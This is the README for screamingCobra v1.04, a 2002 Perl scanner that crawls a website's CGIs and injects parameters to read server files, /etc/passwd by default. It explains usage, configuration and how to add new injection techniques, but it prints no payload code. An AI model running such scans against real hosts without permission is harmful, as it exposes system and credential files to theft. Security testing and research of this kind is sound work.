screamingCobra v1.04 -- < January 12, 2002 >
by Samy Kamkar [commport5@LucidX.com]

usage: screamingCobra.pl [-e] [-i] [-s|-v] <http://host.name>[:port][/start/page]

=======================
== TABLE OF CONTENTS ==
=======================
1. What is screamingCobra
2. What screamingCobra does
3. Why was screamingCobra written
4. Configuring screamingCobra
  A. Basic Configuration
  B. Adding Techniques
5. Command-line options
6. Supported Operating Systems
=======================


   _____________________________
1. __ WHAT IS SCREAMING COBRA __
   =============================
Any CGI that doesn't check arguements that are passed to it
over the web are possibly vulnerable to attacks which allow
a malicious user get read access to almost any file on that
system, if not access to execute programs.  screamingCobra
is almost always able to find those bugs REMOTELY due to
the common errors programmers make.

screamingCobra is an application for remote vulnerability
discovery in ANY UNKNOWN web applications such as CGIs and PHP
pages.  Simply put, it attemps to find vulernabilities in all
web applications on a host without knowing anything about the
applications.  Modern CGI scanners scan a host for CGIs
with known vulnerabilities.  screamingCobra is able to 'find'
the actual vulnerabilities in ANY CGI, whether it has been
discovered before or not.


   _______________________________
2. __ WHAT SCREAMING COBRA DOES __
   ===============================
I've even been told by administrators of very well known
sites that they've been able to use screamingCobra (originally
called crawl5b, before this release) and find at least one
bug which allows anyone to get read access to almost any file
on the system, if not access to execute applications.  When
you launch screamingCobra, it crawls the specified host
over the web and attempts to find all the CGIs or any other
applications where parameters can be passed.  It then attempts
to use a few techniques to read files on that machine.  By
default, it attempts to read /etc/passwd, and if successful it
will display the URL in which it used to access the file.


   _____________________________________
3. __ WHY WAS SCREAMING COBRA WRITTEN __
   =====================================
The core was originally written at DefCon 9, specifically at
Caezar's Challeng V, for Challenge B:
"identify hypothetical cases of common bugs in server-side
programs and then to describe algorithms that could detect those 
problems from a special version of the client software".
I did just that, and wrote a program to go along with it.

Caezar's Challenge: http://caezarschallenge.org

   _________________________________
4. __ CONFIGURING SCREAMING COBRA __
   =================================
  A. -- BASIC CONFIGURATION --
   There's not much, if any, configuring to be done.
   Although, there may be some things you want to change.
   I'll go over those now.  Open up screamingCobra.pl
   in a text editor and check these lines out:
   
   Line 29: this is the file it will attempt to access
    change 'etc/passwd' to, say, 'bin/ls' to attempt
    to read /bin/ls.
    I recommend KEEPING /etc/passwd as the default.
   
   Line 30: this is the additional technique for finding
    vulnerabilities.  Leave it alone if you don't know
    what it's doing :)
   
   Line 32: @first -- this is the HTML tags to look for
    that contain URLs.  The array, by default, includes
    'a' (for <a href's..), 'img' (<img src...), 'body',
    'area', 'frame' and 'meta'.  You may add more, just
    follow the defaults.
   
   Line 36: @second -- this is the tag options to look
    for inside of a tag, such as 'href' (for <a href..)
    and 'src' (<img src...).
    This will NOT just look at the 2nd word in the tag,
    but any words following a whitespace so it WILL
    catch something like <a blah="" href="...">.
   
   Line 40: @ignore -- extensions of files to not do a
    GET on, just because they usually don't contain HTML
    and are a waste of bandwidth.
   
   Line 45: @requests -- this is the basic header that's
    sent to the server when requesting a page or CGI.
    screamingCobra randomly chooses one for each GET it
    does, add more according to the two default ones.
   
   That's it!  You probably didn't have to change anything
   or add anything, but it's good to know how to.


  B. -- ADDING TECHNIQUES --
   Adding techniques and using them is very simple!
   First, find where the '$technique1' variable is set (by
   default, it's at line 29).  After all the variables in
   that section that begin with 'technique' and end in a
   number, add a new one, incrementing the number by 1.
   For example, if you have a fresh screamingCobra.pl,
   you would stick in:
$technique3 = "your technique to be GET'd";
   The 3 is because there are already two other techniques.

   Now to actually be able to use the 3rd technique (and
   all techniques ending with a number less than 3 [2, 1]),
   you must add that many '-e's when running screamingCobra.

   For example, if you wanted to run screamingCobra using
   technique 3, you would run like so:
./screamingCobra.pl -eee http://host.name

   You may of course use any other arguements, as well, and
   use whatever host/port/page you want to.


   __________________________
5. __ COMMAND-LINE OPTIONS __
   ==========================
usage: screamingCobra.pl [-e] [-i] [-s|-v] <http://host.name>[:port][/start/page]

-e: EXTRA TECHNIQUES
    Uses multiple techniques to find bugs.
    This will take over twice the amount of time to
    complete a scan and the other techniques used with
    this options are not commonly found in applications
    but if you need to do a very strong pen test, you
    may want to use this option.

-i: DON'T IGNORE ANY FILES
    In the program, there is a user-configurable array
    of extensions to ignore (not to GET).  Those include
    images, compressed files, etc..  This is because those
    files will usually not be HTML pages so there won't
    be any useful data in them, and they may take up a lot
    of bandwidth as well.  This option ignores that list
    and screamingCobra will not ignore any files.

-s: STATUS BAR
    This creates a status bar with constantly updated
    numbers of pages accessed, bugs found and attempted
    vulnerability scans.  Cannot be used with verbose,
    although the status bar is ALWAYS displayed when the
    user unexpectedly exits or kills the application (^C)
    or when the application is finished crawling.

-v: VERBOSE
    This will display all the files being accessed and
    will also list when CGIs are found and attempted to
    be broken (to find vulnerabilities).  Cannot be used
    with status bar, although a status bar is ALWAYS
    displayed when the user unexpectedly exits or kills the
    application (^C) or when the application is finished
    crawling.

<http://host.name>: Hostname or IP of host to scan. [REQUIRED]
    For example, http://cobra.LucidX.com

[:port]: Port to connect to, default is 80.
    For example, http://cobra.LucidX.com:80

[/start/page]: Page to start on.
    For example, http://cobra.LucidX.com/screamingCobra-1.03/
    and also,    http://cobra.LucidX.com:80/index.html


   __________________________________
6. __ SUPPORTED OPERATING SYSTEMS  __
   ==================================
screamingCobra will work on ANY operating system that has
Perl 5.x.

I also compiled a binary for
Windows, sCobra-WIN.exe.

This will be recompiled for every new version of
screamingCobra and will be included in all releases.


===================
== END OF README ==
===================
That's all for now.
Contact me (Samy Kamkar) at commport5@LucidX.com for
questions or comments, hope to hear from you all! :)